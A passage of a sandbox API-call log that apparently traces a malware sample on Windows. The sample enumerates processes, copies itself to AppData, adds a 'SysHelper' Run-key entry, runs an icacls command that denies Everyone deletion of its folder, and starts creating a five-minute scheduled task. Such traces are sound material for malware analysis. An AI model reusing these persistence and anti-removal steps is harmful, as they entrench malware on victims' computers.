returned 1 [0036.453] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x8b0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="bay-antiques.exe") returned 0x10 [0036.453] CloseHandle (hObject=0x5b8) returned 1 [0036.453] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x660) returned 0x5b8 [0036.453] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.454] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x13d0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="geneva minimal.exe") returned 0x12 [0036.454] CloseHandle (hObject=0x5b8) returned 1 [0036.454] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x32c) returned 0x5b8 [0036.454] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.455] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x2c0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="floating-illustrations.exe") returned 0x1a [0036.456] CloseHandle (hObject=0x5b8) returned 1 [0036.456] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x604) returned 0x5b8 [0036.456] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.457] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1280000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="bizrate.exe") returned 0xb [0036.457] CloseHandle (hObject=0x5b8) returned 1 [0036.457] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x328) returned 0x5b8 [0036.457] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.458] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xd0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="tourist.exe") returned 0xb [0036.458] CloseHandle (hObject=0x5b8) returned 1 [0036.458] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x5b8 [0036.458] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.459] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x380000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="blanket.exe") returned 0xb [0036.459] CloseHandle (hObject=0x5b8) returned 1 [0036.459] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2ac) returned 0x5b8 [0036.459] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.460] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1200000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="pgp locked former.exe") returned 0x15 [0036.461] CloseHandle (hObject=0x5b8) returned 1 [0036.461] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x714) returned 0x5b8 [0036.461] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.462] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x13a0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="drum_childrens_choose.exe") returned 0x19 [0036.462] CloseHandle (hObject=0x5b8) returned 1 [0036.462] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x5b8 [0036.462] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.463] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xa20000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="cameras_efficient_about.exe") returned 0x1b [0036.463] CloseHandle (hObject=0x5b8) returned 1 [0036.463] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x5b8 [0036.463] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.464] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x230000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="animated_min_rich.exe") returned 0x15 [0036.464] CloseHandle (hObject=0x5b8) returned 1 [0036.464] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x5b8 [0036.464] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.465] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1190000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="twenty-error.exe") returned 0x10 [0036.466] CloseHandle (hObject=0x5b8) returned 1 [0036.466] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x5b8 [0036.466] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.467] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xb0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="proceeds.exe") returned 0xc [0036.467] CloseHandle (hObject=0x5b8) returned 1 [0036.467] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x320) returned 0x5b8 [0036.467] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.468] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x11e0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="violations.exe") returned 0xe [0036.468] CloseHandle (hObject=0x5b8) returned 1 [0036.468] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e8) returned 0x5b8 [0036.468] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.469] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x1350000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="way.exe") returned 0x7 [0036.469] CloseHandle (hObject=0x5b8) returned 1 [0036.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0036.469] CloseHandle (hObject=0x0) returned 0 [0036.469] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f0) returned 0x5b8 [0036.469] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.470] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x400000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="penelop0611_2019-11-06_10-30.exe_.exe") returned 0x25 [0036.471] CloseHandle (hObject=0x5b8) returned 1 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x28) returned 0x71c628 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x3266170 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x3248958 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x325d7f8 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x325da60 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x325dcc8 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x325df30 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x325e198 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x325e400 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x325e668 [0036.476] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x25c) returned 0x325e8d0 [0036.481] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d870 | out: phkResult=0x18d870*=0x5b8) returned 0x0 [0036.482] RegQueryValueExW (in: hKey=0x5b8, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d86c, lpData=0x18bf98, lpcbData=0x18d850*=0x400 | out: lpType=0x18d86c*=0x0, lpData=0x18bf98*=0x0, lpcbData=0x18d850*=0x400) returned 0x2 [0036.482] RegCloseKey (hKey=0x5b8) returned 0x0 [0036.482] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0036.482] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0036.482] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" " [0036.482] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" ", pNumArgs=0x18d834 | out: pNumArgs=0x18d834) returned 0x3281078*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" [0036.482] lstrcpyW (in: lpString1=0x18b798, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" [0036.482] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe") returned="penelop0611_2019-11-06_10-30.exe_.exe" [0036.482] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18cf98 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0036.482] UuidCreate (in: Uuid=0x18d7e4 | out: Uuid=0x18d7e4) returned 0x0 [0036.482] UuidToStringW (in: Uuid=0x18d7e4, StringUuid=0x18d878 | out: StringUuid=0x18d878) returned 0x0 [0036.482] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x50) returned 0x3251f10 [0036.483] RpcMgmtStatsVectorFree (in: StatsVector=0x18d878 | out: StatsVector=0x18d878) returned 0x0 [0036.483] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="f1658be0-4925-4d7c-8e40-cf12d31fe3a1" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1") returned 1 [0036.483] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1"), lpSecurityAttributes=0x0) returned 1 [0036.483] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb0) returned 0x3203f10 [0036.483] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb0) returned 0x3203fc8 [0036.483] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1", pMore="penelop0611_2019-11-06_10-30.exe_.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe") returned 1 [0036.483] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0 [0036.483] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe"), bFailIfExists=0) returned 1 [0036.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d874 | out: phkResult=0x18d874*=0x5bc) returned 0x0 [0036.518] lstrcpyW (in: lpString1=0x18c798, lpString2="\"" | out: lpString1="\"") returned="\"" [0036.518] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe" [0036.518] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart" [0036.518] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart") returned 132 [0036.518] RegSetValueExW (in: hKey=0x5bc, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart", cbData=0x108 | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart") returned 0x0 [0036.519] RegCloseKey (hKey=0x5bc) returned 0x0 [0036.519] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xf0) returned 0x32305e8 [0036.519] SetLastError (dwErrCode=0x0) [0036.519] lstrcpyW (in: lpString1=0x18a798, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0036.519] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1" [0036.519] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0036.519] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d798*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d7f4 | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18d7f4*(hProcess=0x5b8, hThread=0x5bc, dwProcessId=0x928, dwThreadId=0x92c)) returned 1 [0036.578] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0036.653] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0036.666] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0036.681] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0036.697] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x102 [0036.713] WaitForSingleObject (hHandle=0x5b8, dwMilliseconds=0x1) returned 0x0 [0036.717] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3203fc8 | out: hHeap=0x6f0000) returned 1 [0036.717] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3251f10 | out: hHeap=0x6f0000) returned 1 [0036.718] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xf0) returned 0x7444a8 [0036.718] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xf0) returned 0x32663d8 [0036.718] CoInitialize (pvReserved=0x0) returned 0x0 [0036.972] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0036.972] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xf0) returned 0x3231988 [0036.972] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d85c | out: ppv=0x18d85c*=0x29208e0) returned 0x0 [0037.087] TaskScheduler:ITaskService:Connect (This=0x29208e0, serverName=0x18d2e8*(varType=0x0, wReserved1=0x74, wReserved2=0x44a0, wReserved3=0x74, varVal1=0x77, varVal2=0xf0), user=0x18d2f8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0xf8), domain=0x18d308*(varType=0x0, wReserved1=0x0, wReserved2=0xf0, wReserved3=0x0, varVal1=0x77, varVal2=0x7), password=0x18d318*(varType=0x0, wReserved1=0x325, wReserved2=0xd804, wReserved3=0x18, varVal1=0x420cab, varVal2=0x6f0000)) returned 0x0 [0037.090] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32492b8 [0037.090] TaskScheduler:ITaskService:GetFolder (in: This=0x29208e0, Path="\\", ppFolder=0x18d864 | out: ppFolder=0x18d864*=0x9cff98) returned 0x0 [0037.093] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32492b8 | out: hHeap=0x6f0000) returned 1 [0037.093] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32492b8 [0037.093] ITaskFolder:DeleteTask (This=0x9cff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0037.094] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32492b8 | out: hHeap=0x6f0000) returned 1 [0037.094] TaskScheduler:ITaskService:NewTask (in: This=0x29208e0, flags=0x0, ppDefinition=0x18d868 | out: ppDefinition=0x18d868*=0x2920968) returned 0x0 [0037.097] TaskScheduler:IUnknown:Release (This=0x29208e0) returned 0x1 [0037.097] ITaskDefinition:get_RegistrationInfo (in: This=0x2920968, ppRegistrationInfo=0x18d83c | out: ppRegistrationInfo=0x18d83c*=0x2920a28) returned 0x0 [0037.098] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x3249300 [0037.098] IRegistrationInfo:put_Author (This=0x2920a28, Author="Author Name") returned 0x0 [0037.098] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.098] IUnknown:Release (This=0x2920a28) returned 0x1 [0037.098] ITaskDefinition:get_Principal (in: This=0x2920968, ppPrincipal=0x18d844 | out: ppPrincipal=0x18d844*=0x2920bb8) returned 0x0 [0037.098] IPrincipal:put_LogonType (This=0x2920bb8, LogonType=3) returned 0x0 [0037.098] IUnknown:Release (This=0x2920bb8) returned 0x1 [0037.098] ITaskDefinition:get_Settings (in: This=0x2920968, ppSettings=0x18d84c | out: ppSettings=0x18d84c*=0x2920ad8) returned 0x0 [0037.098] ITaskSettings:put_StartWhenAvailable (This=0x2920ad8, StartWhenAvailable=1) returned 0x0 [0037.098] IUnknown:Release (This=0x2920ad8) returned 0x1 [0037.098] ITaskSettings:get_IdleSettings (in: This=0x2920ad8, ppIdleSettings=0x18d830 | out: ppIdleSettings=0x18d830*=0x2920b48) returned 0x0 [0037.098] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x3249300 [0037.098] IIdleSettings:put_WaitTimeout (This=0x2920b48, WaitTimeout="PT5M") returned 0x0 [0037.098] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.098] IUnknown:Release (This=0x2920b48) returned 0x1 [0037.098] ITaskDefinition:get_Triggers (in: This=0x2920968, ppTriggers=0x18d82c | out: ppTriggers=0x18d82c*=0x2920a98) returned 0x0 [0037.099] ITriggerCollection:Create (in: This=0x2920a98, Type=1, ppTrigger=0x18d838 | out: ppTrigger=0x18d838*=0x2920c18) returned 0x0 [0037.099] IUnknown:Release (This=0x2920a98) returned 0x1 [0037.099] IUnknown:QueryInterface (in: This=0x2920c18, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d854 | out: ppvObject=0x18d854*=0x2920c18) returned 0x0 [0037.099] IUnknown:Release (This=0x2920c18) returned 0x2 [0037.099] ITrigger:get_Repetition (in: This=0x2920c18, ppRepeat=0x18d840 | out: ppRepeat=0x18d840*=0x2920c68) returned 0x0 [0037.099] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x3249300 [0037.099] IRepetitionPattern:put_Interval (This=0x2920c68, Interval="PT5M") returned 0x0 [0037.099] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.099] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x3249300 [0037.099] IRepetitionPattern:put_Duration (This=0x2920c68, Duration="") returned 0x0 [0037.100] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.101] ITrigger:put_Repetition (This=0x2920c18, Repetition=0x2920c68) returned 0x0 [0037.101] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x3249300 [0037.101] ITrigger:put_Id (This=0x2920c18, Id="Trigger1") returned 0x0 [0037.101] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.101] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x3249300 [0037.101] ITrigger:put_EndBoundary (This=0x2920c18, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0037.101] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.101] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d314 | out: lpSystemTimeAsFileTime=0x18d314*(dwLowDateTime=0x14d6c870, dwHighDateTime=0x1d5956a)) [0037.107] GetLastError () returned 0x0 [0037.107] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x327f328 [0037.107] GetLastError () returned 0x0 [0037.107] GetLastError () returned 0x0 [0037.107] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0037.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d27c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d27c) returned 26 [0037.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d27c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d27c) returned 26 [0037.108] GetLastError () returned 0x0 [0037.109] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x327f1a8 [0037.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x327f1a8, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0037.109] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa0) returned 0x3281120 [0037.109] GetLastError () returned 0x0 [0037.109] ITrigger:put_StartBoundary (This=0x2920c18, StartBoundary="2019-11-08T00:01:47") returned 0x0 [0037.109] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3249300 | out: hHeap=0x6f0000) returned 1 [0037.109] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3257570 | out: hHeap=0x6f0000) returned 1 [0037.109] IUnknown:Release (This=0x2920c18) returned 0x1 [0037.109] ITaskDefinition:get_Actions (in: This=0x2920968, ppActions=0x18d848 | out: ppActions=0x18d848*=0x29209e0) returned 0x0 